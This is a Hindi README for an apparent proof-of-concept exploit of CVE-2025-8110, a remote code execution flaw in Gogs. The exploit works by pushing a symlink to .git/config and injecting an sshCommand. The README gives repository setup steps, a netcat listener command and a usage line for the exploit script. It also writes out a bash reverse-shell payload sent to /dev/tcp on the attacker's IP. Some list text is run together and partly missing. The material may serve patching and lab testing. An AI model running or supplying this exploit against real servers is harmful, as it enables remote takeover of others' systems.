
CVE-2025-8110 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो सिम्बोलिक लिंक्स के माध्यम से पाथ ट्रैवर्सल और sshCommand इंजेक्शन का शोषण करके रिवर्स शेल पहुंचाने वाली Gogs RCE भेद्यता है।
CVE-2025-8110 के लिए एक प्रूफ ऑफ कॉन्सेप्ट (PoC), जो Gogs में एक गंभीर कमजोरी है जो सिम्बोलिक लिंक बाईपास और sshCommand इंजेक्शन के माध्यम से .git/config हेरफेर द्वारा रिमोट कोड एग्ज़ीक्यूशन (RCE) की अनुमति देती है।
यह एक्सप्लॉइट Gogs API सामग्री प्रबंधन में एक पाथ ट्रैवर्सल दोष को लक्षित करता है। एक प्रमाणित उपयोगकर्ता यह कर सकता है:
.git/config की ओर इशारा करने वाला एक सिम्बोलिक लिंक पुश करें।sshCommand इंजेक्ट करें।!, @) को संभालने के लिए क्रेडेंशियल्स को स्वचालित रूप से URL-एन्कोड करता है।Rich लाइब्रेरी का उपयोग करके उच्च-दृश्यता लॉगिंग।git clone https://github.com/Ghxstsec/CVE-2025-8110.git
cd CVE-2025-8110
निर्भरताएँ इंस्टॉल करें:
pip3 install -r requirements.txt
💻 उपयोग
अपना लिसनर शुरू करें:
nc -lvnp 6666
एक्सप्लॉइट चलाएँ:
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'
तर्क:
sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
जब Gogs कोई ऐसा Git कमांड निष्पादित करता है जिसके लिए नेटवर्क ट्रांसपोर्ट की आवश्यकता होती है (जैसे मिरर सिंक या आंतरिक संदर्भ जांच), तो यह sshCommand को लागू करता है, जिससे रिवर्स शेल ट्रिगर होता है।
| तर्क | विवरण |
|---|
-u, --url | लक्ष्य Gogs इंस्टेंस का बेस URL (जैसे, http://target.htb:3000)। |
-lh, --host | हमलावर का IP (LHOST) जहाँ रिवर्स शेल वापस कनेक्ट होगा। |
-lp, --port | आपकी मशीन पर कॉन्फ़िगर किया गया लिसनर पोर्ट (LPORT)। |
-p, --password | प्रमाणीकरण करने के लिए pwnuser खाते का पासवर्ड। |
-x, --proxy | (वैकल्पिक) ट्रैफ़िक को स्थानीय प्रॉक्सी के माध्यम से रूट करता है (डिफ़ॉल्ट: http://localhost:8080)। |